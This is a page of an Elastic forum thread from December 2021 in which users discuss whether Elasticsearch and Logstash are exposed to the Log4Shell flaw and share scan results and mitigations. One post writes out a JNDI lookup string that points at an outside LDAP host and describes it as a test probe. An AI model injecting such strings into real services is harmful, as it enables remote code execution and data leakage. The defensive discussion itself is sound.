# Zero-day-exploit in log4j2 which is part of elasticsearch

**URL:** https://discuss.elastic.co/t/zero-day-exploit-in-log4j2-which-is-part-of-elasticsearch/291439
**Category:** Elasticsearch
**Created:** [December 10, 2021, 3:46pm UTC](https://discuss.elastic.co/t/zero-day-exploit-in-log4j2-which-is-part-of-elasticsearch/291439 "2021-12-10T15:46:15Z")
**Posts on this page:** 20
**Page:** 3

<div class="post-metadata">

### Author: ![Derek\_Ha](https://sea2.discourse-cdn.com/elastic/user_avatar/discuss.elastic.co/derek_ha/32/60096_2.png) [@Derek\_Ha](https://discuss.elastic.co/u/Derek_Ha)
#### Post date: [December 13, 2021, 9:45am UTC](https://discuss.elastic.co/t/zero-day-exploit-in-log4j2-which-is-part-of-elasticsearch/291439/43 "2021-12-13T09:45:41Z")

</div>

Base on the affected version of the announcement, would like to confirm actually nothing need to do if

1. Elasticsearch version is 7.2+ with bundled JDK11+
2. logstash 7.X with JDK 11.0.1+

is it correct?

---

<div class="post-metadata">

### Author: ![erictung](https://sea2.discourse-cdn.com/elastic/user_avatar/discuss.elastic.co/erictung/32/109492_2.png) [@erictung](https://discuss.elastic.co/u/erictung)
#### Post date: [December 13, 2021, 10:12am UTC](https://discuss.elastic.co/t/zero-day-exploit-in-log4j2-which-is-part-of-elasticsearch/291439/44 "2021-12-13T10:12:36Z")

</div>

> [@Tuckson](#):
>
> Target is today.

Looks like 7.16.1 is now released.

 ![image](https://us1.discourse-cdn.com/elastic/original/3X/4/f/4f1c0e583c0965ab6e5348d3c27c016a4ec1fcf4.png)

And when I tried to list files inside `/usr/share/elasticsearch/lib` directory, it seems like log4j-core JAR file is removed from the distribution (at least from my observation inside the Docker image)

```auto
user@hostname:/usr/share/elasticsearch# ls -lah lib/
total 29M
dr-xr-xr-x. 3 root root 4.0K Dec 11 00:35 .
drwxrwxr-x. 1 root root 81 Dec 11 05:12 ..
-r--r--r--. 1 root root 112K May 11 2020 HdrHistogram-2.1.9.jar
-r--r--r--. 1 root root 14M Dec 11 00:30 elasticsearch-7.16.1.jar
-r--r--r--. 1 root root 27K Dec 11 00:30 elasticsearch-cli-7.16.1.jar
-r--r--r--. 1 root root 69K Dec 11 00:30 elasticsearch-core-7.16.1.jar
-r--r--r--. 1 root root 52K Dec 11 00:30 elasticsearch-geo-7.16.1.jar
-r--r--r--. 1 root root 43K Dec 11 00:32 elasticsearch-launchers-7.16.1.jar
-r--r--r--. 1 root root 1.6M Dec 11 00:31 elasticsearch-log4j-7.16.1.jar
-r--r--r--. 1 root root 28K Dec 11 00:30 elasticsearch-lz4-7.16.1.jar
-r--r--r--. 1 root root 14K Dec 11 00:30 elasticsearch-plugin-classloader-7.16.1.jar
-r--r--r--. 1 root root 19K Dec 11 00:30 elasticsearch-secure-sm-7.16.1.jar
-r--r--r--. 1 root root 154K Dec 11 00:30 elasticsearch-x-content-7.16.1.jar
-r--r--r--. 1 root root 1.2M May 11 2020 hppc-0.8.1.jar
-r--r--r--. 1 root root 342K May 11 2020 jackson-core-2.10.4.jar
-r--r--r--. 1 root root 58K May 11 2020 jackson-dataformat-cbor-2.10.4.jar
-r--r--r--. 1 root root 89K May 11 2020 jackson-dataformat-smile-2.10.4.jar
-r--r--r--. 1 root root 46K May 11 2020 jackson-dataformat-yaml-2.10.4.jar
-r--r--r--. 1 root root 17K Dec 11 00:32 java-version-checker-7.16.1.jar
-r--r--r--. 1 root root 1.7M Nov 24 09:22 jna-5.10.0.jar
-r--r--r--. 1 root root 630K May 4 2021 joda-time-2.10.10.jar
-r--r--r--. 1 root root 77K May 11 2020 jopt-simple-5.0.2.jar
-r--r--r--. 1 root root 258K May 11 2020 log4j-api-2.11.1.jar
-r--r--r--. 1 root root 1.8M Oct 20 23:41 lucene-analyzers-common-8.10.1.jar
-r--r--r--. 1 root root 152K Oct 20 23:41 lucene-backward-codecs-8.10.1.jar
-r--r--r--. 1 root root 3.5M Oct 20 23:41 lucene-core-8.10.1.jar
-r--r--r--. 1 root root 97K Oct 20 23:41 lucene-grouping-8.10.1.jar
-r--r--r--. 1 root root 206K Oct 20 23:41 lucene-highlighter-8.10.1.jar
-r--r--r--. 1 root root 149K Oct 20 23:41 lucene-join-8.10.1.jar
-r--r--r--. 1 root root 51K Oct 20 23:41 lucene-memory-8.10.1.jar
-r--r--r--. 1 root root 104K Oct 20 23:41 lucene-misc-8.10.1.jar
-r--r--r--. 1 root root 373K Oct 20 23:41 lucene-queries-8.10.1.jar
-r--r--r--. 1 root root 374K Oct 20 23:41 lucene-queryparser-8.10.1.jar
-r--r--r--. 1 root root 240K Oct 20 23:41 lucene-sandbox-8.10.1.jar
-r--r--r--. 1 root root 303K Oct 20 23:41 lucene-spatial3d-8.10.1.jar
-r--r--r--. 1 root root 245K Oct 20 23:41 lucene-suggest-8.10.1.jar
-r--r--r--. 1 root root 667K Jul 1 16:01 lz4-java-1.8.0.jar
-r--r--r--. 1 root root 302K May 11 2020 snakeyaml-1.26.jar
-r--r--r--. 1 root root 51K May 11 2020 t-digest-3.2.jar
dr-xr-xr-x. 6 root root 81 Dec 11 00:35 tools

```

So I assume that Elastic is mitigating this issue by removing that JAR file entirely?

---

<div class="post-metadata">

### Author: ![Randika\_Madhushan](https://sea2.discourse-cdn.com/elastic/user_avatar/discuss.elastic.co/randika_madhushan/32/97770_2.png) [@Randika\_Madhushan](https://discuss.elastic.co/u/Randika_Madhushan)
#### Post date: [December 13, 2021, 10:31am UTC](https://discuss.elastic.co/t/zero-day-exploit-in-log4j2-which-is-part-of-elasticsearch/291439/45 "2021-12-13T10:31:16Z")

</div>

will it support the new Logstash 6.8.21 or 7.16.1 for the Elasticsearch 5.5.0 and 6.8.0?

---

<div class="post-metadata">

### Author: ![zhwen0](https://avatars.discourse-cdn.com/v4/letter/z/f17d59/32.png) [@zhwen0](https://discuss.elastic.co/u/zhwen0)
#### Post date: [December 13, 2021, 10:34am UTC](https://discuss.elastic.co/t/zero-day-exploit-in-log4j2-which-is-part-of-elasticsearch/291439/46 "2021-12-13T10:34:54Z")

</div>

Is the ES-Hadoop connector affected by this issue?

I assume it is not affected as it is a library and any logging would done by the caller (ie. Hadoop/Spark/Hive). But a confirmation would be good.

Thanks.

---

<div class="post-metadata">

### Author: ![gotti](https://avatars.discourse-cdn.com/v4/letter/g/7bcc69/32.png) [@gotti](https://discuss.elastic.co/u/gotti)
#### Post date: [December 13, 2021, 11:12am UTC](https://discuss.elastic.co/t/zero-day-exploit-in-log4j2-which-is-part-of-elasticsearch/291439/47 "2021-12-13T11:12:12Z")

</div>

I tried running [https://github.com/mergebase/log4j-detector](https://github.com/mergebase/log4j-detector) over it and that's my result:

```auto
(gotti@plattfisch 796) docker run --rm -it --entrypoint bash docker.elastic.co/elasticsearch/elasticsearch:7.16.1
root@95841cb1bcd7:/usr/share/elasticsearch# ls
LICENSE.txt NOTICE.txt README.asciidoc bin config data jdk lib logs modules plugins
root@95841cb1bcd7:/usr/share/elasticsearch# jdk/bin/ja
jar jarsigner java javac javadoc javap
root@95841cb1bcd7:/usr/share/elasticsearch# jdk/bin/java -jar /tmp/log4j-detector-2021.12.12.jar .
-- Analyzing paths (could take a long time).
-- Note: specify the '--verbose' flag to have every file examined printed to STDERR.
./bin/elasticsearch-sql-cli-7.16.1.jar contains Log4J-2.x >= 2.10.0 _VULNERABLE_ :-(
./lib/elasticsearch-log4j-7.16.1.jar contains Log4J-2.x <= 2.0-beta8 _POTENTIALLY_SAFE_ :-|
root@95841cb1bcd7:/usr/share/elasticsearch#

```

Looks like the vulnerability is only partially fixed ...

---

<div class="post-metadata">

### Author: ![ampotdar](https://sea2.discourse-cdn.com/elastic/user_avatar/discuss.elastic.co/ampotdar/32/58956_2.png) [@ampotdar](https://discuss.elastic.co/u/ampotdar)
#### Post date: [December 13, 2021, 1:45pm UTC](https://discuss.elastic.co/t/zero-day-exploit-in-log4j2-which-is-part-of-elasticsearch/291439/48 "2021-12-13T13:45:31Z")

</div>

We have successfully mitigated it .  
just follow below links.

[https://dlcdn.apache.org/logging/log4j/2.15.0/apache-log4j-2.15.0-bin.tar.gz](https://dlcdn.apache.org/logging/log4j/2.15.0/apache-log4j-2.15.0-bin.tar.gz)

[https://docs.jamf.com/technical-articles/Mitigating\_the\_Apache\_Log4j\_2\_Vulnerability.html](https://docs.jamf.com/technical-articles/Mitigating_the_Apache_Log4j_2_Vulnerability.html)

For more details feel free to connect. Cheers

REgards,  
Amit Potdar

---

<div class="post-metadata">

### Author: ![satishkovuru](https://avatars.discourse-cdn.com/v4/letter/s/e56c9b/32.png) [@satishkovuru](https://discuss.elastic.co/u/satishkovuru)
#### Post date: [December 13, 2021, 7:27pm UTC](https://discuss.elastic.co/t/zero-day-exploit-in-log4j2-which-is-part-of-elasticsearch/291439/49 "2021-12-13T19:27:16Z")

</div>

How to fix this Log4j issue if we have installed Elasticsearch through Package?  
Do you provide any steps to resolve this issue and upgrade to the latest version?

---

<div class="post-metadata">

### Author: ![Chris\_Solidum](https://sea2.discourse-cdn.com/elastic/user_avatar/discuss.elastic.co/chris_solidum/32/98866_2.png) [@Chris\_Solidum](https://discuss.elastic.co/u/Chris_Solidum)
#### Post date: [December 13, 2021, 11:09pm UTC](https://discuss.elastic.co/t/zero-day-exploit-in-log4j2-which-is-part-of-elasticsearch/291439/50 "2021-12-13T23:09:59Z")

</div>

Is there a way to download Elasticsearch 6.8.21? The link from the download page currently gives a 404.

> **[Elasticsearch 6.8.21](https://www.elastic.co/downloads/past-releases/elasticsearch-6-8-21)**

---

<div class="post-metadata">

### Author: ![orangejulius](https://sea2.discourse-cdn.com/elastic/user_avatar/discuss.elastic.co/orangejulius/32/98868_2.png) [@orangejulius](https://discuss.elastic.co/u/orangejulius)
#### Post date: [December 14, 2021, 12:43am UTC](https://discuss.elastic.co/t/zero-day-exploit-in-log4j2-which-is-part-of-elasticsearch/291439/51 "2021-12-14T00:43:11Z")

</div>

Does anyone have steps to reproduce any sort of log4j related issue with _Elasticsearch_ (not logstash, etc).

What I have tried so far:

- Change a slowlog threshhold to 1ms, so almost all queries will be printed to the slowlog
- Send a query to Elasticsearch that includes the exploit string, something like `${jndi:ldap:someDNSentryYouCanViewLogsFor.com/a}`
- Verify that the full string appears in the slowlogs

This does _not_ result in a logged DNS query, so it seems like other methods may be required to leak data from an Elasticsearch cluster.

Update: I was using a version of Elasticsearch (7.9) that appears to not be vulnerable to any of the information leakage. Maybe someone can verify on an older version?

---

<div class="post-metadata">

### Author: ![Anvar\_Shahith](https://sea2.discourse-cdn.com/elastic/user_avatar/discuss.elastic.co/anvar_shahith/32/77472_2.png) [@Anvar\_Shahith](https://discuss.elastic.co/u/Anvar_Shahith)
#### Post date: [December 14, 2021, 11:36am UTC](https://discuss.elastic.co/t/zero-day-exploit-in-log4j2-which-is-part-of-elasticsearch/291439/53 "2021-12-14T11:36:28Z")

</div>

@dadoonet @jsvd @Christian_Dahlqvist  
We are running our cluster with the given below versions. I guess we don't need to upgrade our version to 7.16.1 based on the above article. However, please confirm it

## Current version details

elasticsearch version: 7.13.x with bundled openjdk 16 2021-03-16  
logstash version: 7.13 with bundled openjdk 11.0.11 2021-04-20

---

<div class="post-metadata">

### Author: ![gruens](https://avatars.discourse-cdn.com/v4/letter/g/278dde/32.png) [@gruens](https://discuss.elastic.co/u/gruens)
#### Post date: [December 14, 2021, 1:40pm UTC](https://discuss.elastic.co/t/zero-day-exploit-in-log4j2-which-is-part-of-elasticsearch/291439/54 "2021-12-14T13:40:56Z")

</div>

We are using the following repourl on our rhel machines:

[https://artifacts.elastic.co/packages/oss-7.x/yum](https://artifacts.elastic.co/packages/oss-7.x/yum)

Unfortunately, the latest es version seems to be Elasticsearch-oss-7.10.2-1.x86\_64

Will there be any patches in near futures or is this a dead end?

---

<div class="post-metadata">

### Author: ![begin](https://sea2.discourse-cdn.com/elastic/user_avatar/discuss.elastic.co/begin/32/98916_2.png) [@begin](https://discuss.elastic.co/u/begin)
#### Post date: [December 14, 2021, 2:55pm UTC](https://discuss.elastic.co/t/zero-day-exploit-in-log4j2-which-is-part-of-elasticsearch/291439/55 "2021-12-14T14:55:58Z")

</div>

I do not understand which version is affected by the vulnerability.  
Why is v7.7 affected while v7.8 is not?  
Are they the same when using JDK version 11?

Does anyone understand?

---

<div class="post-metadata">

### Author: ![DavidTurner](https://sea2.discourse-cdn.com/elastic/user_avatar/discuss.elastic.co/davidturner/32/22453_2.png) [@DavidTurner](https://discuss.elastic.co/u/DavidTurner)
#### Post date: [December 14, 2021, 3:09pm UTC](https://discuss.elastic.co/t/zero-day-exploit-in-log4j2-which-is-part-of-elasticsearch/291439/56 "2021-12-14T15:09:12Z")

</div>

> [@begin](#):
>
> Why is v7.7 affected while v7.8 is not?

I think you're misinterpreting the [announcement](https://discuss.elastic.co/t/apache-log4j2-remote-code-execution-rce-vulnerability-cve-2021-44228-esa-2021-31/291476) which says:

> Supported versions of Elasticsearch (6.8.9+, 7.8+) used with recent versions of the JDK (JDK9+) are not susceptible to either remote code execution or information leakage.

It doesn't say that 7.7 is affected, just that it's not a supported version (i.e. it's [past EOL](https://www.elastic.co/support/eol)) so it's out of scope.

2021-12-16 edit to add: "out of scope" meaning "out of the scope of this particular sentence". There are other parts of the announcement that relate to EOL versions.

---

<div class="post-metadata">

### Author: ![begin](https://sea2.discourse-cdn.com/elastic/user_avatar/discuss.elastic.co/begin/32/98916_2.png) [@begin](https://discuss.elastic.co/u/begin)
#### Post date: [December 14, 2021, 3:14pm UTC](https://discuss.elastic.co/t/zero-day-exploit-in-log4j2-which-is-part-of-elasticsearch/291439/57 "2021-12-14T15:14:13Z")

</div>

Aah! That's what I'm talking about!  
I understand now.  
Thank you, Mr. DavidTurner.

---

<div class="post-metadata">

### Author: ![cfu](https://avatars.discourse-cdn.com/v4/letter/c/3e96dc/32.png) [@cfu](https://discuss.elastic.co/u/cfu)
#### Post date: [December 14, 2021, 3:52pm UTC](https://discuss.elastic.co/t/zero-day-exploit-in-log4j2-which-is-part-of-elasticsearch/291439/58 "2021-12-14T15:52:47Z")

</div>

When will the logstash version 6.8.21 be available for download? As stated in an earlier comment, there is still a 404 error on the site of the 6.8.21 (and also the 7.16.1) version!

---

<div class="post-metadata">

### Author: ![apgrizz](https://avatars.discourse-cdn.com/v4/letter/a/bc79bd/32.png) [@apgrizz](https://discuss.elastic.co/u/apgrizz)
#### Post date: [December 14, 2021, 4:00pm UTC](https://discuss.elastic.co/t/zero-day-exploit-in-log4j2-which-is-part-of-elasticsearch/291439/59 "2021-12-14T16:00:31Z")

</div>

Hi there,

I upgraded to 7.16.1 on my ECK cluster with the NoLookup flag in our env variables. However, I am still getting indicators from our reports that there are still files with log4j v2.11. Is there anything else we can do?

Note: the message below indicates v7.15.1 of ES but after upgrading to v7.16.1 we get something similar. Also, this filepath is also in question `/usr/share/elasticsearch/lib/log4j-core-2.11.1.jar`

```auto
The library `org.apache.logging.log4j:log4j-core` version `2.11.1` was detected in `Maven library manager` located at `/var/lib/kubelet/pods/<id>/volumes/kubernetes.io~empty-dir/elastic-internal-elasticsearch-bin-local/elasticsearch-sql-cli-7.15.1.jar` and is vulnerable to `CVE-2021-44228`, which exists in versions `< 2.15.0-rc2`.

The vulnerability was found in the [Github Security Advisory](https://nvd.nist.gov/vuln/detail/CVE-2021-44228) with vendor severity: `Critical`.

The vulnerability can be remediated by updating the library to version `2.15.0-rc2` or higher, using `mvn versions:use-latest-releases -Dincludes=org.apache.logging.log4j:log4j-core`.

```

---

<div class="post-metadata">

### Author: ![sandeepkanabar](https://sea2.discourse-cdn.com/elastic/user_avatar/discuss.elastic.co/sandeepkanabar/32/79399_2.png) [@sandeepkanabar](https://discuss.elastic.co/u/sandeepkanabar)
#### Post date: [December 14, 2021, 7:17pm UTC](https://discuss.elastic.co/t/zero-day-exploit-in-log4j2-which-is-part-of-elasticsearch/291439/60 "2021-12-14T19:17:18Z")

</div>

> [@gotti](#):
>
> [GitHub - mergebase/log4j-detector: A public open sourced tool. Log4J scanner that detects vulnerable Log4J versions (CVE-2021-44228, CVE-2021-45046, etc) on your file-system within any application. It is able to even find Log4J instances that are hidden several layers deep. Works on Linux, Windows, and Mac, and everywhere else Java runs, too! TAG\_OS\_TOOL, OWNER\_KELLY, DC\_PUBLIC](https://github.com/mergebase/log4j-detector)

Yes. It does need to be restarted. Additionally, you might need to change the ownership of jar to `logtash:logstash` or whatever it was before, in case it got changed while updating the jar by removing the class.

---

<div class="post-metadata">

### Author: ![dmcmillin](https://sea2.discourse-cdn.com/elastic/user_avatar/discuss.elastic.co/dmcmillin/32/98942_2.png) [@dmcmillin](https://discuss.elastic.co/u/dmcmillin)
#### Post date: [December 14, 2021, 7:41pm UTC](https://discuss.elastic.co/t/zero-day-exploit-in-log4j2-which-is-part-of-elasticsearch/291439/61 "2021-12-14T19:41:42Z")

</div>

I am also with the newest version of Elasticsearch receiving the following  
/usr/share/Elasticsearch/bin/Elasticsearch-sql-cli-7.16.1.jar contains Log4J-2.x \>= 2.10.0 _VULNERABLE_ ☹  
/usr/share/Elasticsearch/lib/Elasticsearch-log4j-7.16.1.jar contains Log4J-2.x \<= 2.0-beta8 _POTENTIALLY\_SAFE_ 😑 (or did you already remove JndiLookup.class?)

Anyone aware of a fix for the sql-cli or does this not pertain to most users?

---

<div class="post-metadata">

### Author: ![sandeepkanabar](https://sea2.discourse-cdn.com/elastic/user_avatar/discuss.elastic.co/sandeepkanabar/32/79399_2.png) [@sandeepkanabar](https://discuss.elastic.co/u/sandeepkanabar)
#### Post date: [December 14, 2021, 7:45pm UTC](https://discuss.elastic.co/t/zero-day-exploit-in-log4j2-which-is-part-of-elasticsearch/291439/63 "2021-12-14T19:45:36Z")

</div>

If you are using `bash` and the ` **/*` does _** NOT**_ work, then run `shopt -s globstar` before running the `zip` command.

```auto
shopt -s globstar
ls -lrt /usr/share/logstash/logstash-core/**/*/log4j-core-2.*

```

```auto
zip -d <output_of_above_command> org/apache/logging/log4j/core/lookup/JndiLookup.class
chown logstash:logstash <output_of_above_command>

```

Restart Logstash.

---

<div class="post-metadata">

### Author: ![satishkovuru](https://avatars.discourse-cdn.com/v4/letter/s/e56c9b/32.png) [@satishkovuru](https://discuss.elastic.co/u/satishkovuru)
#### Post date: [December 14, 2021, 8:00pm UTC](https://discuss.elastic.co/t/zero-day-exploit-in-log4j2-which-is-part-of-elasticsearch/291439/64 "2021-12-14T20:00:08Z")

</div>

Can I download the latest jars of Log4j and palace it under below folders and start Elasticsearch?  
Because when I did this getting error and Elasticsearch is not starting.  
usr/share/Elasticsearch/lib/log4j-api-2.11.1.jar  
/usr/share/Elasticsearch/modules/repository-url/log4j-1.2-api-2.11.1.jar  
/usr/share/Elasticsearch/modules/x-pack-core/log4j-1.2-api-2.11.1.jar  
/usr/share/Elasticsearch/modules/x-pack-identity-provider/log4j-slf4j-impl-2.11.1.jar  
/usr/share/Elasticsearch/modules/x-pack-security/log4j-slf4j-impl-2.11.1.jar  
/usr/share/Elasticsearch/modules/vector-tile/log4j-slf4j-impl-2.11.1.jar

[Previous page](https://discuss.elastic.co/t/zero-day-exploit-in-log4j2-which-is-part-of-elasticsearch/291439.md?page=2)

[Next page](https://discuss.elastic.co/t/zero-day-exploit-in-log4j2-which-is-part-of-elasticsearch/291439.md?page=4)
